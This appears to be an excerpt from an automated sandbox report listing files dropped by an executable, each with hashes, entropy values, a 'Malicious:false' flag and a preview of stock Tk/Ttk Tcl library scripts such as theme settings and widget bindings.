                                                                                                                                                                                                                              Preview:# text.tcl --..#..# This file defines the default bindings for Tk text widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of ::tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# char -..Character position on the line; kept in order..#...to allow moving up or down past short lines while..#...still remembering the desired position...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button we
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24102
                                                                                                                                                                                                                              Entropy (8bit):5.137459715823081
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NJyxt+WaB9USY15gSgC3DbTbXLXKr3cIXyDAbK2LMGgtewT+3oFQRyH5bAy59HmD:NJItNe9USZblXysm7GgteoFQRYMESL
                                                                                                                                                                                                                              MD5:184D05201893B2042D3FA6140FCF277C
                                                                                                                                                                                                                              SHA1:AAD67797864456749ADF0C4A1C0BE52F563C8FB8
                                                                                                                                                                                                                              SHA-256:1D5E7518AFC1382E36BF13FC5196C8A7CD93A4E9D24ACF445522564245A489B0
                                                                                                                                                                                                                              SHA-512:291BDF793CABC5EC27E8265A8A313FE0F4ACAB4DB6CE507A46488A83EEF72CD43CF5815762B22D1C8D64A9EEDEA927E109F937E6573058E5493B1354DD449CB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tk.tcl --..#..# Initialization script normally executed in the interpreter for each Tk-based..# application. Arranges class bindings for widgets...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....# Verify that we have Tk binary and script components from the same release..package require -exact Tk 8.6.13.....# Create a ::tk namespace..namespace eval ::tk {.. # Set up the msgcat commands.. namespace eval msgcat {...namespace export mc mcmax.. if {[interp issafe] || [catch {package require msgcat}]} {.. # The msgcat package is not available. Supply our own.. # minimal replacement... proc mc {src args} {.. return [format $src {*}$args].. }.. proc mc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39557
                                                                                                                                                                                                                              Entropy (8bit):5.186073482848965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:+oj+AqE9cn9tJNgDt0/vsKulXgo65Eh6pQb:+6+Zv/ggEdio65Ehdb
                                                                                                                                                                                                                              MD5:670837EBC804E7B6E2F65F840BC508D6
                                                                                                                                                                                                                              SHA1:2DD316487F87DDE5D05F65F564CAE4E1306CE662
                                                                                                                                                                                                                              SHA-256:3AAA66AE8E74B94481C3F6642634E78BB5D7892771E7C27B54DFA56DED0B2F3C
                                                                                                                                                                                                                              SHA-512:BB8350ADDF1A25C037DFD60A4AFCBF401CACAD2A370B60BD0BA0981D938C46394BD8D40D1E9A66F4E3C46FCC2A41CF688E78C4F1FE918B45E70D3E92D8B3D116
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tkfbox.tcl --..#..#.Implements the "TK" standard file selection dialog box. This dialog..#.box is used on the Unix platforms whenever the tk_strictMotif flag is..#.not set...#..#.The "TK" standard file selection dialog box is similar to the file..#.selection dialog box on Win95(TM). The user can navigate the..#.directories by clicking on the folder icons or by selecting the..#."Directory" option menu. The user can select files by clicking on the..#.file icons or by entering a filename in the "Filename:" entry...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {.. namespace import -force ::tk::msgcat::*.. variable showHiddenBtn 0.. variable showHiddenVar 1.... # Create the images if they did not already exist... if {![info exists ::tk::Priv(updirImage)]} {...s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3713
                                                                                                                                                                                                                              Entropy (8bit):4.915055696129498
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:InrWdo3L7Fe5qusQGdrMNnQbfIxEOxE0kFgG0FgGouox9FrGVuwg3kNcT+z5UlEr:UWdsOBn/1i+pqxwNjKs
                                                                                                                                                                                                                              MD5:01F28512E10ACBDDF93AE2BB29E343BC
                                                                                                                                                                                                                              SHA1:C9CF23D6315218B464061F011E4A9DC8516C8F1F
                                                                                                                                                                                                                              SHA-256:AE0437FB4E0EBD31322E4EACA626C12ABDE602DA483BB39D0C5EE1BC00AB0AF4
                                                                                                                                                                                                                              SHA-512:FE3BAE36DDB67F6D7A90B7A91B6EC1A009CF26C0167C46635E5A9CEAEC9083E59DDF74447BF6F60399657EE9604A2314B170F78A921CF948B2985DDF02A89DA6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Ttk widget set: Alternate theme..#....namespace eval ttk::theme::alt {.... variable colors.. array set colors {...-frame .."#d9d9d9"...-window.."#ffffff"...-darker ."#c3c3c3"...-border.."#414141"...-activebg ."#ececec"...-disabledfg."#a3a3a3"...-selectbg."#4a6984"...-selectfg."#ffffff"...-altindicator."#aaaaaa".. }.... ttk::style theme settings alt {.....ttk::style configure "." \... -background .$colors(-frame) \... -foreground .black \... -troughcolor.$colors(-darker) \... -bordercolor.$colors(-border) \... -selectbackground .$colors(-selectbg) \... -selectforeground .$colors(-selectfg) \... -font ..TkDefaultFont \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)] ;...ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -padding "1 1" \... -reli
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3838
                                                                                                                                                                                                                              Entropy (8bit):4.940737732832436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WdbclJFvlyLi+8OWXgQahpvAdNutdHrFBlCFBK2tdHkFBlhKgY1geAWUWeFVvtdp:C8EQPNeWgFeqdXj
                                                                                                                                                                                                                              MD5:F07A3A86362E9E253BE91F59714FE134
                                                                                                                                                                                                                              SHA1:84DE1AB2EAE62E4B114F0E613BD94955AFA9E6C7
                                                                                                                                                                                                                              SHA-256:E199CC9C429B35A09721D0A22543C3729E2B8462E68DFA158C0CEC9C70A0D79D
                                                                                                                                                                                                                              SHA-512:324EAF9F857076CA4FECB26D8DF76F8BB1D3F15EAE55D6B6C9689BF1682B306AC7A3592B6A518D23F9FE4DC21EFB6ACF1ECA948F889FA1ADFFA0E12C0BEAB57F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Aqua theme (OSX native look and feel)..#....namespace eval ttk::theme::aqua {.. ttk::style theme settings aqua {.....ttk::style configure . \... -font TkDefaultFont \... -background systemWindowBackgroundColor \... -foreground systemLabelColor \... -selectbackground systemSelectedTextBackgroundColor \... -selectforeground systemSelectedTextColor \... -selectborderwidth 0 \... -insertwidth 1.....ttk::style map . \... -foreground {....disabled systemDisabledControlTextColor....background systemLabelColor} \... -selectbackground {....background systemSelectedTextBackgroundColor....!focus systemSelectedTextBackgroundColor} \... -selectforeground {....background systemSelectedTextColor....!focus systemSelectedTextColor}.....# Button...ttk::style configure TButton -anchor center -width -6 \... -foreground systemControlTextColor...ttk::style map TButton \... -foreground {....pressed white... {alternate !pressed !background} white}...ttk::styl
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3014
                                                                                                                                                                                                                              Entropy (8bit):4.917794267131833
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:A5N+EqJWR1eTC01cG61ELLgrDgk1JgQ6TQGvhV5giT6TUP+3JWMHTeJ:kN+RQfccG61ooDgQ6dNT6TUP+PHO
                                                                                                                                                                                                                              MD5:D4BF1AF5DCDD85E3BD11DBF52EB2C146
                                                                                                                                                                                                                              SHA1:B1691578041319E671D31473A1DD404855D2038B
                                                                                                                                                                                                                              SHA-256:E38A9D1F437981AA6BF0BDD074D57B769A4140C0F7D9AFF51743FE4ECC6DFDDF
                                                                                                                                                                                                                              SHA-512:25834B4B231F4FF1A88EEF67E1A102D1D0546EC3B0D46856258A6BE6BBC4B381389C28E2EB60A01FF895DF24D6450CD16CA449C71F82BA53BA438A4867A47DCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for Buttons, Checkbuttons, and Radiobuttons...#..# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed"..# state; widgets remain "active" if the pointer is dragged out...# This doesn't seem to be conventional, but it's a nice way..# to provide extra feedback while the grab is active...# (If the button is released off the widget, the grab deactivates and..# we get a <Leave> event then, which turns off the "active" state)..#..# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are..# delivered to the widget which received the initial <Button>..# event. However, Tk [grab]s (#1223103) and menu interactions..# (#1222605) can interfere with this. To guard against spurious..# <Button1-Enter> events, the <Button1-Enter> binding only sets..# the pressed state if the button is currently active...#....namespace eval ttk::button {}....bind TButton <Enter> ..{ %W instate !disabled {%W state active} }..bind TButton <Leave>..{ %W state !active }..bind TButton <s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4809
                                                                                                                                                                                                                              Entropy (8bit):4.905115353394083
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:KrS4se/XhW03cC7TxPp/uo1ZUb0WZvSoetCgV+tMWG3xT3xgNB4x76FAuoxVYuIJ:oS4sSjWwFAGkhiP3xT3xL6B2bbe
                                                                                                                                                                                                                              MD5:2B20E7B2E6BDDBEB14F5F63BF38DBF24
                                                                                                                                                                                                                              SHA1:43DB48094C4BD7DE3B76AFBC051D887FEFE9887E
                                                                                                                                                                                                                              SHA-256:CFFC59931FDD1683AD23895E92522CF49B099128753FCDFF34374024E42CF995
                                                                                                                                                                                                                              SHA-512:1EB5EA78D26D18EAD6563AFBF1798F71723001DCC945E7DB3E4368564D0563029BE3565876AD8CB97331CFE34B2A0A313FA1BF252B87049160FE5DCD65434775
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# "Clam" theme...#..# Inspired by the XFCE family of Gnome themes...#....namespace eval ttk::theme::clam {.. variable colors.. array set colors {...-disabledfg.."#999999"...-frame .."#dcdad5"...-window .."#ffffff"...-dark..."#cfcdc8"...-darker .."#bab5ab"...-darkest.."#9e9a91"...-lighter.."#eeebe7"...-lightest .."#ffffff"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-altindicator.."#5895bc"...-disabledaltindicator."#a0a0a0".. }.... ttk::style theme settings clam {.....ttk::style configure "." \... -background $colors(-frame) \... -foreground black \... -bordercolor $colors(-darkest) \... -darkcolor $colors(-dark) \... -lightcolor $colors(-lighter) \... -troughcolor $colors(-darker) \... -selectbackground $colors(-selectbg) \... -selectforeground $colors(-selectfg) \... -selectborderwidth 0 \... -font TkDefaultFont \... ;.....ttk::style map "." \... -background [list disabled $colors(-frame) \..... active $colors(-lighter)] \..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3864
                                                                                                                                                                                                                              Entropy (8bit):4.935603001745302
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:zcJZjdWs+WVB4ULsMF7tnvnuSuqo5DKxiFgG0FgGHx9FrGTtu/3Kt+iW2PbuAk38:zcJZEstB4UoituSm+VtYErY
                                                                                                                                                                                                                              MD5:0205663142775F4EF2EB104661D30979
                                                                                                                                                                                                                              SHA1:452A0D613288A1CC8A1181C3CC1167E02AA69A73
                                                                                                                                                                                                                              SHA-256:424BBA4FB6836FEEBE34F6C176ED666DCE51D2FBA9A8D7AA756ABCBBAD3FC1E3
                                                                                                                                                                                                                              SHA-512:FB4D212A73A6F5A8D2774F43D310328B029B52B35BEE133584D8326363B385AB7AA4AE25E98126324CC716962888321E0006E5F6EF8563919A1D719019B2D117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# "classic" Tk theme...#..# Implements Tk's traditional Motif-like look and feel...#....namespace eval ttk::theme::classic {.... variable colors; array set colors {...-frame.."#d9d9d9"...-window.."#ffffff"...-activebg."#ececec"...-troughbg."#c3c3c3"...-selectbg."#c3c3c3"...-selectfg."#000000"...-disabledfg."#a3a3a3"...-indicator."#b03060"...-altindicator."#b05e5e".. }.... ttk::style theme settings classic {...ttk::style configure "." \... -font..TkDefaultFont \... -background..$colors(-frame) \... -foreground..black \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -troughcolor.$colors(-troughbg) \... -indicatorcolor.$colors(-frame) \... -highlightcolor.$colors(-frame) \... -highlightthickness.1 \... -selectborderwidth.1 \... -insertwidth.2 \... ;.....# To match pre-Xft X11 appearance, use:...#.ttk::style configure . -font {Helvetica 12 bold}.....ttk::style map "." -background \... [list disabled
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12718
                                                                                                                                                                                                                              Entropy (8bit):5.063548300335668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:otLzBJ9SfinaXUBLPYXlk7fKiLH+AzIoJdJwGknmyLsxoVEQGITse8g5sarkT32e:wB5aXmLPYXmrKxLL7A
                                                                                                                                                                                                                              MD5:F7065D345A4BFB3127C3689BF1947C30
                                                                                                                                                                                                                              SHA1:9631C05365B0F5A36E4CA5CBA83628CCD7FCBDE1
                                                                                                                                                                                                                              SHA-256:68EED4AF6D2EC5B3EA24B1122A704B040366CBE2F458103137479352FFA1475A
                                                                                                                                                                                                                              SHA-512:74B99B9E326680150DD5EC7263192691BCD8A71B2A4EE7F3177DEDDD43E924A7925085C6D372731A70570F96B3924450255B2F54CA3B9C44D1160CA37E715B00
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Combobox bindings...#..# <<NOTE-WM-TRANSIENT>>:..#..#.Need to set [wm transient] just before mapping the popdown..#.instead of when it's created, in case a containing frame..#.has been reparented [#1818441]...#..#.On Windows: setting [wm transient] prevents the parent..#.toplevel from becoming inactive when the popdown is posted..#.(Tk 8.4.8+)..#..#.On X11: WM_TRANSIENT_FOR on override-redirect windows..#.may be used by compositing managers and by EWMH-aware..#.window managers (even though the older ICCCM spec says..#.it's meaningless)...#..#.On OSX: [wm transient] does utterly the wrong thing...#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]...#.The "noActivates" attribute prevents the parent toplevel..#.from deactivating when the popdown is posted, and is also..#.necessary for "help" windows to receive mouse events...#."hideOnSuspend" makes the popdown disappear (resp. reappear)..#.when the parent toplevel is deactivated (resp. reactivated)...#.(see [#18147
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4674
                                                                                                                                                                                                                              Entropy (8bit):4.836935825704301
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DRYEqfLDxGmxGUetobPT6t6brv0q3O4Uxz0:DWEqTDbxdKobPqe5PUxw
                                                                                                                                                                                                                              MD5:1A799FE3754307A5AADE98C367E2F5D7
                                                                                                                                                                                                                              SHA1:C64BE4B77F0D298610F4EE20FCEBBAEE3C8B5F22
                                                                                                                                                                                                                              SHA-256:5B33F32B0139663347D6CF70A5A838F8E4554E0E881E97C8478B77733162EA73
                                                                                                                                                                                                                              SHA-512:89F367F9A59730BCDFC5ABDE0E35A10B72A1F19C68A768BA4524C938EF5C5CAF094C1BFA8FC74173F65201F6617544223C2143252A9F691EE9AAA7543315179F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Map symbolic cursor names to platform-appropriate cursors...#..# The following cursors are defined:..#..#.standard.-- default cursor for most controls..#.""..-- inherit cursor from parent window..#.none..-- no cursor..#..#.text..-- editable widgets (entry, text)..#.link..-- hyperlinks within text..#.crosshair.-- graphic selection, fine control..#.busy..-- operation in progress..#.forbidden.-- action not allowed..#..#.hresize..-- horizontal resizing..#.vresize..-- vertical resizing..#..# Also resize cursors for each of the compass points,..# {nw,n,ne,w,e,sw,s,se}resize...#..# Platform notes:..#..# Windows doesn't distinguish resizing at the 8 compass points,..# only horizontal, vertical, and the two diagonals...#..# OSX doesn't have resize cursors for nw, ne, sw, or se corners...# We use the Tk-defined X11 fallbacks for these...#..# X11 doesn't have a "forbidden" cursor (usually a slashed circle);..# "pirate" seems to be the conventional cursor for this purpose...#..# Windows has a
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4553
                                                                                                                                                                                                                              Entropy (8bit):4.933885986949396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lNl3u3lCFUeuMGN3xbVJU+N3xbVJh3IwxkxlBqatUrtY:zl3ZUe9GN3NVC+N3NVjqntUZY
                                                                                                                                                                                                                              MD5:FC79F42761D63172163C08F0F5C94436
                                                                                                                                                                                                                              SHA1:AABAB4061597D0D6DC371F46D14AAA1A859096DF
                                                                                                                                                                                                                              SHA-256:49AE8FAF169165BDDAF01D50B52943EBAB3656E9468292B7890BE143D0FCBC91
                                                                                                                                                                                                                              SHA-512:F619834A95C9DEB93F8184BCC437D701A961C77E24A831ADBD5C145556D26986BFDA2A6ACB9E8784F8B2380E122D12AC893EB1B6ACF03098922889497E1FF9EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for default theme...#....namespace eval ttk::theme::default {.. variable colors.. array set colors {...-frame..."#d9d9d9"...-foreground.."#000000"...-window..."#ffffff"...-text .."#000000"...-activebg.."#ececec"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-darker .."#c3c3c3"...-disabledfg.."#a3a3a3"...-indicator.."#4a6984"...-disabledindicator."#a3a3a3"...-altindicator.."#9fbdd8"...-disabledaltindicator."#c0c0c0".. }.... ttk::style theme settings default {.....ttk::style configure "." \... -borderwidth .1 \... -background .$colors(-frame) \... -foreground .$colors(-foreground) \... -troughcolor .$colors(-darker) \... -font ..TkDefaultFont \... -selectborderwidth.1 \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -insertwidth .1 \... -indicatordiameter.10 \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)]...ttk::style map "."
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17658
                                                                                                                                                                                                                              Entropy (8bit):5.026830367336785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:sca9Jzcyzf6yzwO+v+iPT3vKof8q3YIuR13a:sT9Jzcy76wiV3YNa
                                                                                                                                                                                                                              MD5:7FFD7A32C7F8E234763E99E3357DB624
                                                                                                                                                                                                                              SHA1:67C67557F3A6DC8B240E85D46F6B733FEE45A013
                                                                                                                                                                                                                              SHA-256:266553EB9EED333DD836BA96204AE008F10686F4F12C404187F1E01CAB65D246
                                                                                                                                                                                                                              SHA-512:D18B73E44F37ED92B9FD7C1F6510285D1280EB5BC665B46996E538924E9D1CAD63337279BF92587132C3AEA497325A17CCE671EA59537B350F6D921C25346F39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# DERIVED FROM: tk/library/entry.tcl r1.22..#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 2004, Joe English..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ttk {.. namespace eval entry {...variable State.....set State(x) 0...set State(selectMode) none...set State(anchor) 0...set State(scanX) 0...set State(scanIndex) 0...set State(scanMoved) 0.....# Button-2 scan speed is (scanNum/scanDen) characters...# per pixel of mouse movement....# The standard Tk entry widget uses the equivalent of...# scanNum = 10, scanDen = average character width....# I don't know why that was chosen....#...set State(scanNum) 1...set State(scanDen) 1...set State(deadband) 3.;# #pixels for mouse-moved deadband... }..}....### Option database settings...#..option add *TEntry.cursor [ttk::cursor text] widg
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5732
                                                                                                                                                                                                                              Entropy (8bit):5.001928619185109
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NzEh94ntnVU8Z/1LkAKgW22SeLMQR8hzcksejmOF4ytZm:Sh9ahV3ZWAKgWDfktm
                                                                                                                                                                                                                              MD5:80331FCBE4C049FF1A0D0B879CB208DE
                                                                                                                                                                                                                              SHA1:4EB3EFDFE3731BD1AE9FD52CE32B1359241F13CF
                                                                                                                                                                                                                              SHA-256:B94C319E5A557A5665B1676D602B6495C0887C5BACF7FA5B776200112978BB7B
                                                                                                                                                                                                                              SHA-512:A4BD2D91801C121A880225F1F3D0C4E30BF127190CF375F6F7A49EB4239A35C49C44F453D6D3610DF0D6A7B3CB15F4E79BD9C129025CC496CEB856FCC4B6DE87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Font specifications...#..# This file, [source]d at initialization time, sets up the following..# symbolic fonts based on the current platform:..#..# TkDefaultFont.-- default for GUI items not otherwise specified..# TkTextFont.-- font for user text (entry, listbox, others)..# TkFixedFont.-- standard fixed width font..# TkHeadingFont.-- headings (column headings, etc)..# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.)..# TkTooltipFont.-- font to use for tooltip windows..# TkIconFont.-- font to use for icon captions..# TkMenuFont.-- used to use for menu items..#..# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation..# (On Windows and Mac OS X as of Oct 2007)...#..# +++ Platform notes:..#..# Windows:..#.The default system font changed from "MS Sans Serif" to "Tahoma"..# .in Windows XP/Windows 2000...#..#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,..#.although many MS programs still use "MS Sans Serif 8"..#..#.Should use
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6443
                                                                                                                                                                                                                              Entropy (8bit):4.9213750923402735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:toMcJQkmcE6fNuLyiCzSLSRwgppdT3kXdpK3dpKkSH2tOTjvAG:tRc6kFbcH2pyXz+zO2y
                                                                                                                                                                                                                              MD5:F11A76FBABF35E446A1200A5A7A6730A
                                                                                                                                                                                                                              SHA1:4CBAB3507C1EF275691C98620D2B5CEEB9043B3E
                                                                                                                                                                                                                              SHA-256:54663FBF524CAD9D74AB1EC44B7FDDE0B87F06E5347191962C97F51F714E29BB
                                                                                                                                                                                                                              SHA-512:95471D1519AE663EC7EB4639D847019E0C9F70DEA2B0680D81FB8BBE7CD1FF643A3DF5E06CA2CC54385BE094BDCC64AB0F1AA1652F91D16C4EF7B68CB670371E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for Menubuttons...#..# Menubuttons have three interaction modes:..#..# Pulldown: Press menubutton, drag over menu, release to activate menu entry..# Popdown: Click menubutton to post menu..# Keyboard: <space> or accelerator key to post menu..#..# (In addition, when menu system is active, "dropdown" -- menu posts..# on mouse-over. Ttk menubuttons don't implement this)...#..# For keyboard and popdown mode, we hand off to tk_popup and let..# the built-in Tk bindings handle the rest of the interaction...#..# ON X11:..#..# Standard Tk menubuttons use a global grab on the menubutton...# This won't work for Ttk menubuttons in pulldown mode,..# since we need to process the final <ButtonRelease> event,..# and this might be delivered to the menu. So instead we..# rely on the passive grab that occurs on <Button> events,..# and transition to popdown mode when the mouse is released..# or dragged outside the menubutton...#..# ON WINDOWS:..#..# I'm not sure what the hell is going on h
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5825
                                                                                                                                                                                                                              Entropy (8bit):4.96378772387536
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:RErUhyi5JeUQBWdz6eP8ClR6/u6AsBmPNNiREUkheLY1EVL23sN2JJjQdD:6uyiyDQBP8q6/u6AUREUsNEVq3y2jkdD
                                                                                                                                                                                                                              MD5:F811F3E46A4EFA73292F40D1CDDD265D
                                                                                                                                                                                                                              SHA1:7FC70A1984555672653A0840499954B854F27920
                                                                                                                                                                                                                              SHA-256:22264D8D138E2C0E9A950305B4F08557C5A73F054F8215C0D8CE03854042BE76
                                                                                                                                                                                                                              SHA-512:4424B7C687EB9B1804ED3B1C685F19D4D349753B374D9046240F937785C9713E8A760ADA46CB628C15F9C7983CE4A7987691C968330478C9C1A9B74E953E40AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for TNotebook widget..#....namespace eval ttk::notebook {.. variable TLNotebooks ;# See enableTraversal..}....bind TNotebook <Button-1>..{ ttk::notebook::Press %W %x %y }..bind TNotebook <Right>...{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Left>...{ ttk::notebook::CycleTab %W -1; break }..bind TNotebook <Control-Tab>..{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Control-Shift-Tab>.{ ttk::notebook::CycleTab %W -1; break }..catch {..bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }..}..bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }....# ActivateTab $nb $tab --..#.Select the specified tab and set focus...#..# Desired behavior:..#.+ take focus when reselecting the currently-selected tab;..#.+ keep focus if the notebook already has it;..#.+ otherwise set focus to the first traversable widget..#. in the newly-selected tab;..#.+ do not leave the focus in a deselected tab...#..proc ttk::notebook::ActivateTab {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2274
                                                                                                                                                                                                                              Entropy (8bit):4.951790637542993
                                                                                                                                                                                                                              Encrypted:false
